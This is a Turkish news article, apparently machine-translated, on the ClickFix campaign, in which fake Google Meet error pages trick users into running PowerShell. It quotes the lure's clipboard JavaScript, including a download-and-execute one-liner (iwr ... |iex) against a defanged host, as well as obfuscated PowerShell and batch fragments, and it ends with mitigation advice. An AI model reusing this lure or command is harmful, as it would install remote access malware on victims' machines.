Yeni bir siber saldırı dalgası, kurbanları kötü niyetli Powershell komutlarını çalıştırmak için kandıran titizlikle hazırlanmış sahte toplantı sayfalarını dağıtarak Google Meet’e kullanıcı güvenini kullanıyor.
ClickFix olarak adlandırılan bu kampanya, gelişmiş sosyal mühendislik taktiklerini kullanıyor, geleneksel güvenlik önlemlerini atlıyor ve pencereleri ve macOS sistemlerini hedef alıyor.
Saldırı, meşru Google’ın davetlerini yakından taklit eden bağlantılar içeren kimlik avı e -postaları ile başlar.
.png
)
Bu bağlantıları tıklayan şüphesiz kullanıcılar, Google Meet arabirimini mükemmel bir şekilde çoğaltan hileli bir sayfaya yönlendirilir.
Site, oturum açma kimlik bilgileri istemek yerine, fabrikasyon bir hata mesajı sunar – genellikle “mikrofon izni reddedildi” uyarısı – ve kullanıcıları, sağlanan bir PowerShell komutunu terminallerine kopyalayıp yapıştırarak sorunu “düzeltmeye” çağırır.
Teknik yem bir JavaScript işleviyle iletilir:
javascriptfunction copyToClipboard() {
const text="powershell -w 1 iwr hxxp://[REDACTED]/1/XR.txt -UseBasicParsing|iex # Verification ID: 116772";
navigator.clipboard.writeText(text)
}
Kullanıcı talimatları izledikten sonra, yapıştırılan komut sessizce bir uzaktan erişim Truva atı (sıçan) indirir ve yürütür ve saldırganlara tehlikeye atılan sistem üzerinde tam kontrol sağlar.
ClickFix kötü amaçlı yazılımın teknik anatomisi
Kötü niyetli PowerShell komutu, ClickFix kampanyasının linchpin’idir.
Kullanır Invoke-WebRequest (iwr) Gizli bir komut dosyası almak için cmdlet (XR.txt) saldırganın sunucusundan ve hemen yürütür Invoke-Expression (iex) cmdlet.
İndirilen bu komut dosyası, çalışma zamanında kendini çözer ve doğrudan bellekte daha fazla kötü niyetli yük başlatır ve birçok uç nokta korumasından kaçar.
Tutulmamış PowerShell kodunun bir parçacığı:
powershellAdd-Type -AssemblyName System.Windows.Forms;
[System.Windows.Forms.MessageBox]::Show('Verification complete!', 'Information', [System.Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information);
# Obfuscated payload follows...
& $udVDkdtSF.Substring(0,3) $udVDkdtSF.Substring(46);exit;
Bir sonraki aşama, bir toplu dosya indirmeyi içerir (noanti-vm.bat) kurbanın AppData dizinin içine.
Bu parti komut dosyası, tespitten kaçınmak için dağınık değişkenlerden komutları yeniden yapılandıran bir teknik olan Çevre Değişken Manipülasyonu ve Dize Dilimleme kullanılarak yoğun bir şekilde gizlenmiştir:
text%UMOGM:~2,1%%FkYBZvOHArkFVTJLVCDt:~6,1%%ZeGUDpukA:~2,1%...
Bu, şu şekildedir:
textSeTLOCaL EnableDeLayEDEXpaNSion
Yürütüldükten sonra, sıçan hassas verileri dışarı atabilir, Infostealers (örneğin Lumma Stealer, Darkgate) gibi ek kötü amaçlı yazılımlar yükleyebilir ve saldırganlara kalıcı uzaktan erişim sağlayabilir.
Daha geniş tehdit manzarası ve azaltma stratejileri
ClickFix kampanyasını ayıran şey, Manuel Kullanıcı Yürütmesi.
Kötü niyetli PowerShell kodu, indirilen bir dosya tarafından otomatik olarak tetiklenmek yerine kullanıcı tarafından çalıştırıldığından, otomatik komut dosyası yürütülmesini izleyen birçok geleneksel güvenlik aracı atayabilir.
Kampanyanın altyapısı, özellikle saldırılarını ölçeklendirmek için şablonları ve arka uçları paylaşan Slav Nation Empire ve Scamquerteo, organize kaçakçı gruplarına atfediliyor.
Önerilen azaltma stratejileri şunları içerir:
- Sıkı PowerShell Yürütme Politikalarının Uygulanması (Yalnızca İmzalı Komut Dosyalarına İzin Ver)
- Yetkisiz program yürütmeyi kısıtlamak için uygulama kontrollerinin kullanılması
- Kullanıcıları sosyal mühendislik taktiklerini ve şüpheli istemleri tanımak için eğitmek
- Bilinen kötü amaçlı alanlara erişimi engellemek için Web İçeriğini Filtreleme
- Yetkisiz komut dosyaları ve kötü amaçlı yazılımlar için düzenli olarak tarama sistemleri
Kesik gerçek şu ki, tek bir dikkatsiz eylem – güvenilmeyen bir kaynaktan bir komutu birleştirmek ve yapıştırmak – tam bir sistem uzlaşmasına neden olabilir.
Bu saldırılar daha sofistike ve ikna edici hale geldikçe, gelişen tehdit manzarasına karşı savunmak için devam eden kullanıcı eğitimi ve katmanlı güvenlik kontrolleri şarttır.
Bu haberi ilginç bul! Anında güncellemeler almak için bizi Google News, LinkedIn ve X’te takip edin!